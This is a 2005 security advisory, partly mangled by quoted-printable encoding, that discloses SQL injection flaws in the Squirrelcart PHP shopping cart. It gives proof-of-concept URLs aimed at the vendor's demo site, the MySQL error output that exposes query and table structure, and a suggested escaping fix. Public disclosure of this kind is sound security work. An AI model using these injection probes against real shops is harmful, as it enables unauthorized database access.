-----BEGIN PGP SIGNED = MESSAGE-----
Hash:=20 SHA1

Dcrab 's Security Advisory
http://icis.digitalparadox= .org/~dcrab
http://www.hackerscenter.com/<= BR>Severity:=20 Medium
Title: Squirrelcart PHP Shopping Cart SQL Injection
Date:=20 30/03/2005

Vendor: Squirrelcart
Vendor Website: = http://squirrelcart.com
Summary: = There=20 are, squirrelcart php shopping cart sql injection.

Proof of Concept Exploits: =

http://demo.squirrelcart.com/index.php?crn=3D'SQ= L_INJECTION&action=3Dshow&show_products_mode=3Dcat_click&PHPS= ESSID=3D2069dbe1646bdc46e4e78718e76e6d15
Sql=20 injection

MySQL error: You have an error in your = SQL syntax;=20 check the manual that corresponds to your MySQL server version for the = right=20 syntax to use near '\'SQL_INJECTION' at line 1
Query was: SELECT=20 View_Products_per_View FROM Categories WHERE record_number =3D = \'SQL_INJECTION=20

http:/= /demo.squirrelcart.com/index.php?crn=3D0&rn=3D&action=3Dshow_deta= il&PHPSESSID=3D2069dbe1646bdc46e4e78718e76e6d15
Sql=20 injection

MySQL error: You have an error in your SQL syntax; check the manual = that=20 corresponds to your MySQL server version for the right syntax to use = near '' at=20 line 1
Query was: SELECT Table_2 FROM REL_Products__Sales_Agreement = WHERE=20 Table_1 =3D
MySQL error: You have an error in your SQL syntax; check = the manual=20 that corresponds to your MySQL server version for the right syntax to = use near=20 '' at line 4
Query was: SELECT DISTINCT d. * FROM Discounts d LEFT = JOIN=20 REL_Products__Discounts pd ON d.record_number =3D pd.Table_2 WHERE = pd.Table_1=20 =3D
MySQL error: You have an error in your SQL syntax; check the = manual that=20 corresponds to your MySQL server version for the right syntax to use = near '' at=20 line 1
Query was: SELECT Table_2 FROM REL_Products__Categories WHERE = Table_1=20 =3D
MySQL error: You have an error in your SQL syntax; check the = manual that=20 corresponds to your MySQL server version for the right syntax to use = near '' at=20 line 4
Query was: SELECT DISTINCT d. * FROM Discounts d LEFT JOIN=20 REL_Products__Discounts pd ON d.record_number =3D pd.Table_2 WHERE = pd.Table_1=20 =3D
MySQL error: You have an error in your SQL syntax; check the = manual that=20 corresponds to your MySQL server version for the right syntax to use = near '' at=20 line 1
Query was: SELECT Table_2 FROM REL_Products__Categories WHERE = Table_1=20 =3D

Possible fix: The usage of htmlspeacialchars(), = mysql_escape_string(),=20 mysql_real_escape_string() and other functions for input validation = before=20 passing user input to the mysql database, or before echoing data on the = screen,=20 would solve these problems.

Author:
These vulnerabilties have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel = free to=20 contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com = or http://icis.digitalparadox= .org/~dcrab.=20 Lookout for my soon to come out book on Secure coding with php.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed = for=20 commercial use: www.pgp.com

iQA/AwUBQkm9TiZV5e8av/DUEQL7YgCcDO1d4A345g0elrACK0qWZJUp3HkAoOuf
= qBVrmet537qezReYIZkVju8Y
=3DclQ/
-----END=20 PGP SIGNATURE-----